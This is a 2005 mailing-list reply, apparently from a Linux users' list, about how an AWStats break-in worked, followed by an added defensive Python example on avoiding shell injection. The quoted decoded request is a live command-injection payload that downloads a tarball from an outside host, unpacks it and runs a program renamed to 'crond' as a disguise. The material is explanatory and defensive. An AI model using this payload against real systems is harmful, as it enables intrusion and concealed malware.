Re: Security Breach

David Cary Hart wrote:
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
Replace the url-encoded characters and you get:

/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00

So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.

I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.

It is enough if the script does something as stupid as:

system("cat $configdir/somefile")

(Assuming the value of configdir is stored in the $configdir variable.)

What gets executed is:

cat |echo ; echo b_exp; [...]; echo e_exp;%00/somefile

The last part will produce an error, most likely, but who cares, the important part was already executed...

It is a classic example of command injection. Most exploits of that type are for SQL queries. This one is for the shell.

--
Aleksandar Milivojevic <amilivojevic@xxxxxx>    Pollard Banknote Limited
Systems Administrator                           1499 Buffalo Place
Tel: (204) 474-2323 ext 276                     Winnipeg, MB  R3T 1L7
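An added example, not code from this thread or from AWStats, that shows the point of the two quoted lines: when the parameter is interpolated into a command string, /bin/sh parses it and `|` and `;` become control operators; when the command is built as an argument vector (what Perl's list-form `system("cat", "$configdir/somefile")` also does) and configdir is checked against an allow-list first, no shell is ever involved. `INJECTED_CONFIGDIR` is a constructed, reduced version of the value quoted above (download and extract steps and the trailing %00 left out), and all function names are hypothetical.

```python
"""Shell command injection through string interpolation, and the
argument-vector alternative. Added example; names are hypothetical."""
import os
import re
import shlex
import subprocess
import tempfile

# Constructed sample: a reduced form of the configdir value quoted in the
# thread. The shell treats '|' and ';' as operators, not as path characters.
INJECTED_CONFIGDIR = "|echo ;echo b_exp;cd /tmp;echo e_exp;"
BENIGN_CONFIGDIR = "/etc/awstats"


def vulnerable_command(configdir: str) -> str:
    """Mirror of the Perl one-liner system("cat $configdir/somefile"):
    the parameter is pasted into one string that /bin/sh will parse."""
    return f"cat {configdir}/somefile"


def shell_control_operators(command: str) -> list:
    """Tokenise a command the way a POSIX shell does and return the control
    operators (|, ;, &, ...) it contains. A value that was meant to be a
    single path argument should contribute none of them."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return [tok for tok in lexer
            if all(ch in lexer.punctuation_chars for ch in tok)]


# Allow-list for a configuration directory: absolute path, plain path
# characters only. '..' segments are rejected separately below.
_SAFE_DIR = re.compile(r"^/[A-Za-z0-9_][A-Za-z0-9_./-]*$")


def validate_configdir(configdir: str) -> bool:
    """Reject anything that is not a plain absolute directory path before
    any command is built from it."""
    if not _SAFE_DIR.match(configdir):
        return False
    return ".." not in configdir.split("/")


def safe_argv(configdir: str) -> list:
    """Build the command as an argument vector. No shell runs, so shell
    metacharacters in configdir would only ever be bytes in a filename."""
    if not validate_configdir(configdir):
        raise ValueError("configdir rejected by allow-list")
    return ["cat", os.path.join(configdir, "somefile")]


def read_somefile(configdir: str) -> str:
    """Hardened equivalent of the quoted system() call: argv form, no shell."""
    result = subprocess.run(safe_argv(configdir), capture_output=True,
                            text=True, check=True)
    return result.stdout


def demo() -> str:
    """Run the hardened path against a temporary directory holding somefile."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "somefile"), "w") as fh:
            fh.write("ok\n")
        return read_somefile(tmp)


if __name__ == "__main__":
    print(shell_control_operators(vulnerable_command(INJECTED_CONFIGDIR)))
    print(shell_control_operators(vulnerable_command(BENIGN_CONFIGDIR)))
    print(validate_configdir(INJECTED_CONFIGDIR), validate_configdir(BENIGN_CONFIGDIR))
    print(demo(), end="")
```

The first print shows the shell's view of the interpolated string: `cat` followed by a pipe and four command separators, which is exactly why "the important part was already executed" before `cat` ever fails on the mangled path. The same tokenizer run on the benign value yields no operators, and the allow-list refuses the injected value outright, so the hardened path never reaches `subprocess.run` with it.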

